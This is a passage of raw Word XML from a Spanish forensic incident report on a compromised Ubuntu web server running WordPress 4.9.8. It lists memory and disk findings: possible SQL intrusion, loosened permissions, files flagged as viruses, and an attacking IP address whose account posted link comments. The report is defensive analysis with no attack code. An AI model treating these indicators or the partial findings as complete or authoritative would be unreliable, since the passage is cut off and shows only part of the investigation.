        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE61CD" w14:textId="2904EB48" w:rsidR="00617D2D" w:rsidRPr="005579DA" w:rsidRDefault="00617D2D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ha arrancado 12 veces el proceso de apache2</w:t>
      </w:r>
      <w:r w:rsidR="003E3C01" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F379200" w14:textId="60BCB636" w:rsidR="00F93FA3" w:rsidRPr="005579DA" w:rsidRDefault="00F93FA3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ha arrancado 3 veces el proceso de sshd</w:t>
      </w:r>
      <w:r w:rsidR="003E3C01" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69AEA9" w14:textId="2047B350" w:rsidR="003A6EE4" w:rsidRPr="005579DA" w:rsidRDefault="003A6EE4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ha arrancado 2 veces el proceso de systemd</w:t>
      </w:r>
      <w:r w:rsidR="003E3C01" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C65401A" w14:textId="4F0FC012" w:rsidR="007069C6" w:rsidRPr="005579DA" w:rsidRDefault="007069C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relativo al comando linux_dmesg se han detectado las siguientes acciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112DE003" w14:textId="77777777" w:rsidR="007069C6" w:rsidRPr="005579DA" w:rsidRDefault="007069C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>einicio del servido</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C1F6F" w14:textId="78F679E2" w:rsidR="007C1187" w:rsidRPr="005579DA" w:rsidRDefault="007069C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>einicio del servicio Journal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782ECBAC" w14:textId="1E3EBD72" w:rsidR="007C1187" w:rsidRPr="005579DA" w:rsidRDefault="007069C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 denegaciones</w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de acción sobre el servicio SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7630F5D7" w14:textId="4CA5C950" w:rsidR="007069C6" w:rsidRPr="005579DA" w:rsidRDefault="007069C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Posible entrada y alteración no deseada a través del servicio SQL en el servidor, esta acción se ha realizado al menos en 3 ocasiones que se tiene constancia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146ED89" w14:textId="6E6AD2DD" w:rsidR="009B115D" w:rsidRPr="005579DA" w:rsidRDefault="009B115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reinicio del Servidor</w:t>
      </w:r>
      <w:r w:rsidR="007069C6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> posterior a estas acciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49139668" w14:textId="27370150" w:rsidR="009B115D" w:rsidRPr="005579DA" w:rsidRDefault="009B115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reinicio del servicio Journal</w:t>
      </w:r>
      <w:r w:rsidR="007069C6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> posterior a estas acciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DB2919" w14:textId="6116136B" w:rsidR="000A2042" w:rsidRPr="005579DA" w:rsidRDefault="000A2042">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se encuentran han detectado la ejecución de comandos que exponen a riesgos al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC26ED" w14:textId="22E6B214" w:rsidR="000A2042" w:rsidRPr="005579DA" w:rsidRDefault="000A2042">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Concede permisos a cualquier usuario o no del sistema a actuar sobre /run/mysqld.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBD1B8" w14:textId="0518EF52" w:rsidR="000A2042" w:rsidRPr="005579DA" w:rsidRDefault="000A2042">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Añade un correo </w:t>
      </w:r>
      <w:hyperlink r:id="rId266" w:tooltip="mailto:test12312321@mailinator.com" w:history="1">
        <w:r w:rsidRPr="005579DA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>test12312321@mailinator.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B014D" w14:textId="4A91C0D6" w:rsidR="000A2042" w:rsidRPr="005579DA" w:rsidRDefault="000A2042">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Usa una la versión 4.9.8. de WordPress que tiene </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>desde 14 de diciembre de 20</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="004D234E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8 8 vulnerabilidades CVE</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CVE (Common Vulnerabilities and Exposures): Lista de registros de información pública sobre vulnerabilidades de seguridad.</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4D234E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> registrados</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15648FB7" w14:textId="4D80E13E" w:rsidR="000A2042" w:rsidRPr="005579DA" w:rsidRDefault="000A2042">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se detectan acciones no usuales por parte del UserId33 (www-data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7DB671" w14:textId="2E5CDA9B" w:rsidR="000A2042" w:rsidRPr="005579DA" w:rsidRDefault="000A2042">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El único Usuario registrado en el servidor es el usuario ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B31BEB" w14:textId="487150B3" w:rsidR="00AF0A8A" w:rsidRPr="005579DA" w:rsidRDefault="0079792F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Analizándose</w:t>
      </w:r>
      <w:r w:rsidR="00AF0A8A" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en VirusTotal, se detecta virus en /var/www/html/.htaccess.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31538D3C" w14:textId="025DFE41" w:rsidR="00AF0A8A" w:rsidRPr="005579DA" w:rsidRDefault="00AF0A8A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se detecta una conexión establecida con la IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 18.195.165.56:41529 atacando al servidor web por el puerto 80 a través del proceso apache2 con Id de proceso 19952.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913DBBA" w14:textId="0A68AADE" w:rsidR="00AF0A8A" w:rsidRPr="005579DA" w:rsidRDefault="00AF0A8A" w:rsidP="00AF0A8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A continuación, se enumeran los distintos indicio y elementos detectados en la captura de la memoria del Disco Duro del dispositivo investigado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D6CDB6" w14:textId="3CC5244E" w:rsidR="00AF0A8A" w:rsidRPr="005579DA" w:rsidRDefault="0079792F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se observa que </w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servidor ha</w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n intentado acceder fallidamente una gran cantidad de veces</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">entre el 31 de diciembre y hasta el </w:t>
      </w:r>
      <w:r w:rsidR="00890F70">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 de enero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60571894" w14:textId="4BC77B7A" w:rsidR="00A603CF" w:rsidRPr="005579DA" w:rsidRDefault="00CC7600">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En el servidor de Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</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A603CF" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, el cual gestiona el WordPress 4.9.8 citado anteriormente se observan las siguientes vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093E38D" w14:textId="77777777" w:rsidR="00A603CF" w:rsidRPr="005579DA" w:rsidRDefault="00A603CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Control de Extensiones de Archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22432E9C" w14:textId="77777777" w:rsidR="00A603CF" w:rsidRPr="005579DA" w:rsidRDefault="00A603CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manejo de Directorios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD7CA1" w14:textId="77777777" w:rsidR="00A603CF" w:rsidRPr="005579DA" w:rsidRDefault="00A603CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Falta de Autenticación y Autorización:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F7E89F" w14:textId="104E1FEB" w:rsidR="00CC7600" w:rsidRPr="005579DA" w:rsidRDefault="009F0CF5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se detecta un virus en el archivo /var/www/html/index.php</w:t>
      </w:r>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAE6D6" w14:textId="202B374A" w:rsidR="000F327A" w:rsidRPr="005579DA" w:rsidRDefault="000F327A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El archivo /var/log/mysql/error.log está vacío.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C2A01" w14:textId="212EA3FD" w:rsidR="009F0CF5" w:rsidRPr="005579DA" w:rsidRDefault="00D87C09">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se observa el registro del usuario anatoly5676, posteriormente, </w:t>
      </w:r>
      <w:r w:rsidR="000F327A" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>este realiza una serie de acciones en el servidor web usando los comentarios de la web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4BF7D" w14:textId="1DCB75A4" w:rsidR="000F327A" w:rsidRPr="005579DA" w:rsidRDefault="00443705">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Envía</w:t>
      </w:r>
      <w:r w:rsidR="000F327A" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> un comentario vacío.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381EA7C" w14:textId="4D2C8036" w:rsidR="000F327A" w:rsidRPr="005579DA" w:rsidRDefault="000F327A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manda un comentario haciendo referencia a visitar el enlace </w:t>
      </w:r>
      <w:hyperlink r:id="rId267" w:history="1">
        <w:r w:rsidRPr="005579DA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://18.195.165.56</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la cual no es https por lo que la comunicación puede estar siendo intervenida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCB213B" w14:textId="594C5552" w:rsidR="00650633" w:rsidRPr="005579DA" w:rsidRDefault="00650633">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manda otro correo electrónico, que al estar en un navegador servidor web este, se ocultará en su visionado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760EF82" w14:textId="08A8E053" w:rsidR="00300F93" w:rsidRPr="005579DA" w:rsidRDefault="00377394">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
